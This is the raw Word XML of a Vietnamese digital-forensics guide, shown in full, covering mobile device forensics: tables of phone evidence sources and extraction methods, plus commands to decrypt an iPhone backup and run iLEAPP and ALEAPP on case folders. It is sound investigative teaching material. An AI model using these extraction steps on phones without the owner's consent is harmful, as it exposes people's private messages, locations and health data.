        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="pháp-chứng-thiết-bị-di-động"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>8. Pháp chứng thiết bị di động</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0165F4">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i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>iOS, Android và kỹ thuật trích xuất chứng cứ từ thiết bị bị khóa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7D783F">
      <w:pPr>
        <w:pStyle w:val="3"/>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Đây là một trong những mảng thay đổi nhanh nhất do cập nhật hệ điều hành, mã hóa và lượng dữ liệu khổng lồ trên điện thoại. iOS và Android hiện đại mã hóa bộ nhớ mặc định; bản dump vật lý có thể vô dụng nếu không có passcode hoặc khóa giải mã.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1985E7">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="nguồn-chứng-cứ-di-động"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>8.1. Nguồn chứng cứ di động</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2833"/>
        <w:gridCol w:w="7213"/>
      </w:tblGrid>
      <w:tr w14:paraId="0C17B83C">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32B6737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Nguồn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6A178C6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Giá trị</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="245F1964">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6BCAE50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SMS/MMS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="698C931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Người gửi, người nhận, nội dung, dấu thời gian và trạng thái đã đọc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="09B0D2EF">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56FD567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Ứng dụng nhắn tin mã hóa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="788165D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Dữ liệu cục bộ và đôi khi có trong cloud backup.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3F1D783E">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57B8949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Nhật ký cuộc gọi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="72CADA5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Cuộc gọi đến, đi, nhỡ, thời điểm và thời lượng.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3E3BF464">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2D8FC47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Vị trí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4293CF3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GPS, trạm phát sóng, Wi-Fi positioning và dữ liệu ứng dụng.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4625E0CC">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4ADEC3F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Ảnh/video</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35989EB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EXIF gồm GPS, thời gian, model thiết bị và thông số camera.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5C5655F5">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5478E3A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Trình duyệt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="27136A5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URL, cache, nội dung biểu mẫu và tải xuống.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3FED4CAF">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2A6C72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Email</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7884B19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Cơ sở dữ liệu cục bộ, tệp đính kèm và cấu hình tài khoản.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="024A63EA">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18888B1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Dữ liệu ứng dụng</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0837ACA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Ngân hàng, mạng xã hội, bản đồ và nhiều ứng dụng chuyên biệt.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="349B62AC">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45339B1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Cloud backup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B77274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Có thể chứa dữ liệu cũ đã không còn trên thiết bị.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="01C34999">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0762AFB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Wi-Fi/Bluetooth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="52A264C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Mạng đã kết nối và thiết bị đã ghép đôi, hỗ trợ suy luận vị trí và quan hệ.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="65CD18FB">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6AAEB39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Dữ liệu sức khỏe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="44C3857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Bước chân, nhịp tim, giấc ngủ; có thể củng cố hoặc bác bỏ lời khai.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="43"/>
    </w:tbl>
    <w:p w14:paraId="602C2C2F">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="mức-độ-trích-xuất"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>8.2. Mức độ trích xuất</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2371"/>
        <w:gridCol w:w="7675"/>
      </w:tblGrid>
      <w:tr w14:paraId="41286D72">
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4969683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Phương pháp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D01BA1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Độ sâu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0416D704">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1A70E7A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Kiểm tra thủ công</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="39A217D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Chụp màn hình; mức thấp nhất, chỉ phù hợp ghi nhận nhanh.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2462D96C">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2045B7C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Logical Extraction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5104CB7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Dựa trên backup/API, ví dụ iTunes hoặc ADB; nhanh nhưng không đầy đủ.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="128B90A8">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275A39E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Advanced Logical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D9D22B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Dùng developer mode hoặc giao thức như AFC để lấy thêm dữ liệu.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="14D228D9">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633FFF7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File System Extraction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2BB7EDA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Dump toàn bộ hệ thống tệp, thường cần jailbreak/root hoặc exploit.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="61257E1F">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86650D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Physical Extraction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16DB1DF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Bản sao bit-for-bit của flash, có thể gồm dữ liệu đã xóa; cần exploit hoặc chip-off.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="22E8EEA5">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3BA426F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Chip-off</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="25F13C6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Tháo chip flash và đọc trực tiếp, phù hợp thiết bị hư hỏng nặng.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="333805CD">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ADEAF1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JTAG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="49ECF62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Truy cập cổng debug phần cứng để vượt một số lớp bảo vệ phần mềm.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="44"/>
    </w:tbl>
    <w:p w14:paraId="7557F5D7">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="ios-với-ileapp"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>8.3. iOS với iLEAPP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473B573A">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65"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>python3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> iphone-backup-decrypter.py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-p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="51"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>'backup_password'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">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-b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> ~/Library/Application\ Support/MobileSync/Backup/UDID/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-o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/the_cyber_bite/cases/CASE001/ios_decrypted/</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65"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>python3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> iLEAPP.py </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="67"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> fs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-i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/the_cyber_bite/cases/CASE001/ios_decrypted/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-o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/the_cyber_bite/cases/CASE001/ileapp_report/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773F51A6">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thể trích xuất iMessage, cuộc gọi, lịch sử vị trí, ảnh có GPS, WhatsApp và lịch sử Safari.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="45"/>
    <w:p w14:paraId="5ADF2EFE">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="android-với-aleapp"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>8.4. Android với ALEAPP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A6D3B8">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65"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>adb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> backup </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="67"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-apk</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-all</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-shared</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">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-f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/the_cyber_bite/cases/CASE001/android_backup.ab</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55"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t># Giải nén backup kiểu cũ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="55"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t># dd if=android_backup.ab bs=24 skip=1 | python3 ... | tar x</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65"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>python3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> ALEAPP.py </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="67"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> fs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-i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/the_cyber_bite/cases/CASE001/android_extracted/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-o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
